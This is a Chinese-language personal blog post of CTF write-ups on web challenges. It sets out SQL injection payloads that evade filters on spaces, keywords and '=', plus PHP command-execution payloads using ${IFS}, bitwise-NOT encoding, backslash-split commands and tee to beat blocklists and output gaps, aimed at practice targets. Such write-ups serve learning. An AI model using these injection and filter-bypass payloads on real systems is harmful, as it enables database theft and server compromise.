<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>CTF成长记录 | 灰太狼</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  
    <meta name="description" content="我一定会回来的">
  
  
  
    <link rel="alternate" href="/atom.xml" title="灰太狼" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
    
<link rel="stylesheet" href="/localshare/css/share.css">

  
  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">灰太狼</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        
          <a class="main-nav-link" href="/."><i class="fa fa-home"></i> 首页</a>
        
          <a class="main-nav-link" href="/archives/"><i class="fa fa-archive"></i> 归档</a>
        
          <a class="main-nav-link" href="/about/"><i class="fa fa-user"></i> 关于</a>
        
          <a class="main-nav-link" href="/atom.xml"><i class="fa fa-rss"></i> 订阅</a>
        
      </nav>
    </div>
    <div id="search-form">
      <div id="result-mask" class="hide"></div>
      <label><input id="search-key" type="text" autocomplete="off" placeholder="搜索"></label>
      <div id="result-wrap" class="hide">
        <div id="search-result"></div>
      </div>
      <div class="hide">
        <template id="search-tpl">
          <div class="item">
            <a href="/{path}" title="{title}">
              <div class="title">{title}</div>
              <div class="time">{date}</div>
              <div class="tags">{tags}</div>
            </a>
          </div>
        </template>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-CTF成长记录" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      CTF成长记录
    </h1>
  


      </header>
    
    <div class="article-meta">
      
      <span class="article-date">
  <i class="fa fa-date"></i>
  <time class="dt-published" datetime="2023-11-17T13:46:32.000Z" itemprop="datePublished">2023年11月17日</time>
</span>
      
      
        <span class="article-views">
  <i class="fa fa-views"></i>
  <i id="busuanzi_container_page_pv">
      <i id="busuanzi_value_page_pv"></i>
  </i>
</span>

      
      
<a href="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/#comments" class="article-comment-link">
  
    
    
    
    
    
  
  <i class="fa fa-commt"></i>
  留言
</a>


    </div>
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h1><span id="more"></span>

<h2 id="空格绕过，and绕过，等号绕过"><a href="#空格绕过，and绕过，等号绕过" class="headerlink" title="空格绕过，and绕过，等号绕过"></a>空格绕过，and绕过，等号绕过</h2><p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120145508186.png" alt="image-20231120145508186"></p>
<p>wllm等于1，回显正常</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120145539922.png" alt="image-20231120145539922"></p>
<p>2-1没有回回显，说明参数没有进行逻辑运算，尝试字符串注入</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120145631311.png" alt="image-20231120145631311"></p>
<p>字符型注入，</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120145732455.png" alt="image-20231120145732455"></p>
<p>–+被过滤，使用–+或者#的替换编码%23</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120145838693.png" alt="image-20231120145838693"></p>
<p>查看是否为空格过滤，替换空格&#x2F;**&#x2F;</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120145944286.png" alt="image-20231120145944286"></p>
<p>查看回显位：</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120150043684.png" alt="image-20231120150043684"></p>
<p>查询表名：</p>
<p>开始查询表明的时候发现还有一个符号被过滤，使用like（）代替等号：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wllm=-1&#x27;/**/union/**/select/**/1,version(),group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like(database())%23</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120151043758.png" alt="image-20231120151043758"></p>
<p>发现LTLT_flag，查看列名</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120151431047.png" alt="image-20231120151431047"></p>
<p>and别过滤了，将table_schema换成表名：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wllm=-1&#x27;/**/union/**/select/**/1,version(),group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like(&#x27;LTLT_flag&#x27;)%23</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120151549779.png" alt="image-20231120151549779"></p>
<p>查看flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wllm=-1&#x27;/**/union/**/select/**/1,version(),group_concat(flag)/**/from/**/LTLT_flag%23</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120151653307.png" alt="image-20231120151653307"></p>
<p>只有一半，使用mid函数，依次输出了20个字符，改变mid函数中后两个参数的值，最终获取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wllm=-1&#x27;/**/union/**/select/**/1,version(),mid(group_concat(flag),1,20)/**/from/**/LTLT_flag%23</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Your Password:NSSCTF&#123;c1ee6d7d-bbf2</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Your Password:-4bfd-9ed6-163ab81e7</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Your Password:f38&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NSSCTF&#123;c1ee6d7d-bbf2-4bfd-9ed6-163ab81e7f38&#125;</span><br></pre></td></tr></table></figure>

<h2 id="库名查找schema-name"><a href="#库名查找schema-name" class="headerlink" title="库名查找schema_name"></a>库名查找schema_name</h2><p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120153246687.png" alt="image-20231120153246687"></p>
<p>给出了，就两列，不用order by了，闭合符号给出了，查询数据库名，表名：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1)))))) union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120153507249.png" alt="image-20231120153507249"></p>
<p>发现ctf库只有一个users表，进去后没有flag，查询别的库名：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1)))))) union select database(),schema_name from information_schema.schemata--+</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120153906221.png" alt="image-20231120153906221"></p>
<p>查看ctftraining库中的数据表：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1)))))) union select database(),group_concat(table_name) from information_schema.tables where table_schema=&#x27;ctftraining&#x27;--+</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120154102691.png" alt="image-20231120154102691"></p>
<p>查看flag：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1)))))) union select database(),group_concat(column_name) from information_schema.columns where table_schema=&#x27;ctftraining&#x27; and table_name=&#x27;flag&#x27;--+</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=-1)))))) union select database(),group_concat(flag) from ctftraining.flag--+</span><br><span class="line">这里使用ctftraining.flag是因为，ctftraining并不是database（）默认的数据库名，所以要使用ctftraining.flag的形式指定flag表</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120154408849.png" alt="image-20231120154408849"></p>
<h2 id="关键字绕过"><a href="#关键字绕过" class="headerlink" title="关键字绕过"></a>关键字绕过</h2><p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231122093005055.png" alt="image-20231122093005055"></p>
<p>果断抓包：</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231122093029845.png" alt="image-20231122093029845"></p>
<p>发现base32，解密之后base5，再次解密：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from user where username = &#x27;$name&#x27;</span><br></pre></td></tr></table></figure>

<p>使用order by查询列数：</p>
<p>发现order by被过滤，使用大小写：</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231122093215780.png" alt="image-20231122093215780"></p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231122104848542.png" alt="image-20231122104848542"></p>
<p><strong>联合查询所查询的数据不存在时，联合查询会构造一个虚拟的数据</strong></p>
<p>本地复现：</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231122104949374.png" alt="image-20231122104949374"></p>
<p>name&#x3D;1’ union select 1,’admin’,’c4ca4238a0b923820dcc509a6f75849b’#&amp;pw&#x3D;1</p>
<p> 其中’c4ca4238a0b923820dcc509a6f75849b’是1的md5加密值。</p>
<p>字段一般都是id，name，password，如果不知道的话，可是将admin放在三个回显位的任意字段，如果出现wrong pass则证明没有错</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231122105733397.png" alt="image-20231122105733397"></p>
<h1 id="RCE注入"><a href="#RCE注入" class="headerlink" title="RCE注入"></a>RCE注入</h1><h2 id="get传参"><a href="#get传参" class="headerlink" title="get传参"></a>get传参</h2><p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120155419424.png" alt="image-20231120155419424"></p>
<p>传入的url参数，get方法接收，执行eval函数：</p>
<p>使用system(‘ls &#x2F;‘);查看根目录文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=system(&#x27;ls /&#x27;);</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120155525273.png" alt="image-20231120155525273"></p>
<p>查看flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=system(&#x27;cat /flllllaaaaaaggggggg&#x27;);</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231120155614422.png" alt="image-20231120155614422"></p>
<h2 id="cookie传参"><a href="#cookie传参" class="headerlink" title="cookie传参"></a>cookie传参</h2><p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121151211901.png" alt="image-20231121151211901"></p>
<p>当cookie等于一发送请求之后，返回了一个php文件rasalghul.php，访问一下子：</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121151355385.png" alt="image-20231121151355385"></p>
<p>发现有一个shell_exec(ip)这个函数像是一个执行php文件的函数，</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121151846366.png" alt="image-20231121151846366"></p>
<p>本来ls还能正常回显，index.php文件也是实际存在，但是报错，发现if田间语句过滤空格，构造payload：</p>
<p>空格的绕过方法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$IFS</span><br><span class="line">$&#123;IFS&#125;</span><br><span class="line">$IFS$1		//1可以换成任意数字</span><br><span class="line">&lt;</span><br><span class="line">&lt;&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rasalghul.php?url=ls$&#123;IFS&#125;/    查看根目录文件</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121152125623.png" alt="image-20231121152125623"></p>
<p>直接查看flag：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rasalghul.php?url=cat$&#123;IFS&#125;/flllllaaaaaaggggggg</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121152206165.png" alt="image-20231121152206165"></p>
<h2 id="无字母RCE绕过"><a href="#无字母RCE绕过" class="headerlink" title="无字母RCE绕过"></a>无字母RCE绕过</h2><p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121153425986.png" alt="image-20231121153425986"></p>
<p>对于无字母数字rce漏洞而言，解决方法就是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">我们首先对一串代码进行取反，然后再进行url编码，在发送请求的时候将其再次取反即可。因为取反之后基本都是不可见字符，所以基本上不会被正则匹配到</span><br></pre></td></tr></table></figure>

<p>们先构造<code>system(&#39;ls /&#39;)</code>，因为没有过滤括号，我们只对括号内外分别取反再编码再取反即可：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo urlencode(~&#x27;system&#x27;);</span><br><span class="line">echo &quot;\n&quot;;</span><br><span class="line">echo urlencode(~&#x27;ls /&#x27;);</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121154029375.png" alt="image-20231121154029375"></p>
<p>再次进行取反，然后提交：</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121154200896.png" alt="image-20231121154200896"></p>
<p>到这一步也就是说黑名单和字母都绕过了，但是我查看的就是根目录文件，结果没显示，检查后发现，最后忘记添加封号了，</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121154428609.png" alt="image-20231121154428609"></p>
<p>那继续编码：</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121154540835.png" alt="image-20231121154540835"></p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121154610628.png" alt="image-20231121154610628"></p>
<h2 id="无回显RCE"><a href="#无回显RCE" class="headerlink" title="无回显RCE"></a>无回显RCE</h2><p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121155640254.png" alt="image-20231121155640254"></p>
<p>首先想到的是编码，但是编码之后回显的只有Can you see anything?，不知道文件是什么，所以这种方法不行，</p>
<p>这里学习到一个东西，这有一个过滤的列表，其中ls被过滤，但是可以使用  \   来将l和s分开，读取的时候无碍：</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121155845695.png" alt="image-20231121155845695"></p>
<p>到这一步了，但是是无回显的，所以这里需要使用一个linux中的命令tee，将读取的内容写入一个文件内部，并保存，构造payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=l\s / | tee 1.txt      列表中没有过滤管道符</span><br></pre></td></tr></table></figure>

<p>发送请求之后，在本网页上访问1.txt文件:</p>
<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121160853623.png" alt="image-20231121160853623"></p>
<p>发现了flag，还像刚才一样，使用tee命令，将flag中的数据保存到a.txt文件当中，在网页中查看：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=ca\t /flllllaaaaaaggggggg | tee a.txt</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121161110570.png" alt="image-20231121161110570"></p>
<p>发现这样查询不了，再次查看列表中过滤的内容，发现la之间也会过滤掉，flag中的la使用\：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=ca\t /flllll\aaaaaaggggggg | tee a.txt</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/image-20231121161246651.png" alt="image-20231121161246651"></p>
<h1 id="SSRF注入"><a href="#SSRF注入" class="headerlink" title="SSRF注入"></a>SSRF注入</h1><h1 id="反序列化注入"><a href="#反序列化注入" class="headerlink" title="反序列化注入"></a>反序列化注入</h1><h1 id="xml注入"><a href="#xml注入" class="headerlink" title="xml注入"></a>xml注入</h1>
        
            <div id="toc-article">
                
  <div class="widget-wrap" id="toc-wrap">
    <h3 class="widget-title"><i class="fa fa-toc"></i> 文章目录</h3>
    <div class="widget">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="toc-text">sql注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87%EF%BC%8Cand%E7%BB%95%E8%BF%87%EF%BC%8C%E7%AD%89%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="toc-text">空格绕过，and绕过，等号绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BA%93%E5%90%8D%E6%9F%A5%E6%89%BEschema-name"><span class="toc-text">库名查找schema_name</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B3%E9%94%AE%E5%AD%97%E7%BB%95%E8%BF%87"><span class="toc-text">关键字绕过</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#RCE%E6%B3%A8%E5%85%A5"><span class="toc-text">RCE注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#get%E4%BC%A0%E5%8F%82"><span class="toc-text">get传参</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#cookie%E4%BC%A0%E5%8F%82"><span class="toc-text">cookie传参</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A0%E5%AD%97%E6%AF%8DRCE%E7%BB%95%E8%BF%87"><span class="toc-text">无字母RCE绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A0%E5%9B%9E%E6%98%BERCE"><span class="toc-text">无回显RCE</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SSRF%E6%B3%A8%E5%85%A5"><span class="toc-text">SSRF注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%B3%A8%E5%85%A5"><span class="toc-text">反序列化注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xml%E6%B3%A8%E5%85%A5"><span class="toc-text">xml注入</span></a></li></ol>
    </div>
  </div>


            </div>
        
        
          <blockquote id="copyright">
              <p>原文链接: <a href="http://example.com/2023/11/17/CTF成长记录/">http://example.com/2023/11/17/CTF成长记录/</a></p>
              <p>版权声明: 转载请注明出处.</p>
          </blockquote>
        
      
    </div>
    <footer class="article-footer">
      
        <div class="article-tag-wrap">
          

          
          
    <div class="social-share">
      <span>分享到:</span>
    </div>



        </div>
      
      
        
<nav id="article-nav">
  
    <a href="/2023/11/17/XXE/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">older</strong>
      <div class="article-nav-title">
        
          XXE
        
      </div>
    </a>
  
  
</nav>

      
      
        








      
    </footer>
  </div>
</article>
</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title"><i class="fa fa-posts"></i> 最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/11/17/CTF%E6%88%90%E9%95%BF%E8%AE%B0%E5%BD%95/">CTF成长记录</a>
          </li>
        
          <li>
            <a href="/2023/11/17/XXE/">XXE</a>
          </li>
        
          <li>
            <a href="/2023/11/16/Hacker-Kid/">Hacker Kid</a>
          </li>
        
          <li>
            <a href="/2023/11/14/Lab-6/">反序列化、XXE、暴力破解、逻辑漏洞</a>
          </li>
        
          <li>
            <a href="/2023/11/14/Billu%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">Billu渗透测试</a>
          </li>
        
      </ul>
    </div>
  </div>


  
    
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title"><i class="fa fa-archive"></i> 归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/">2023年</a><span class="archive-list-count">6</span></li></ul>
    </div>
  </div>


  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title"><i class="fa fa-link"></i> 友情链接</h3>
    <div class="widget">
      <ul>
      
        <li>
          <a target="_blank" rel="noopener" href="http://www.example1.com/">site-name1</a>
        </li>
      
        <li>
          <a target="_blank" rel="noopener" href="http://www.example2.com/">site-name2</a>
        </li>
      
        <li>
          <a target="_blank" rel="noopener" href="http://www.example3.com/">site-name3</a>
        </li>
      
      </ul>
    </div>
  </div>


  
</aside>
        
      </div>
      <a id="totop" href="#top"></a>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      <p>
        <a href="/sitemap.xml">网站地图</a>
        <span> | </span><a href="/atom.xml">订阅本站</a>
        <span> | </span><a href="/about/">联系博主</a>
      </p>
      
        <p>
          <i class="fa fa-visitors"></i>
          <i id="busuanzi_container_site_uv"><i id="busuanzi_value_site_uv"></i></i>
          ，
          <i class="fa fa-views"></i>
          <i id="busuanzi_container_site_pv"><i id="busuanzi_value_site_pv"></i></i>
        </p>
      
      <p>
        <span>Copyright &copy; 2023 bigbigwolf.</span>
        <span>Theme by <a href="https://github.com/chaooo/hexo-theme-BlueLake/" target="_blank">BlueLake.</a></span>
        <span>Powered by <a href="https://hexo.io/" target="_blank">Hexo.</a></span>
      </p>
    </div>
  </div>
</footer>

    </div>
  </div>
  
<script src="/js/jquery-3.4.1.min.js"></script>


<script src="/js/search.json.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>






  
<script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




  
    
<script src="/localshare/js/social-share.js"></script>

    
<script src="/localshare/js/qrcode.js"></script>

  
  



  

  

  

  

  

  

  

  
  





</body>
</html>